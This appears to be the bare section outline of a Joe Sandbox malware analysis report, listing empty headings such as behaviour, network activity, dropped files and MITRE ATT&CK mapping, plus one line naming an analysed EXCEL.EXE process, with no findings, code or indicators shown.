System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 1664 Parent PID: 596

General

Chronological Activities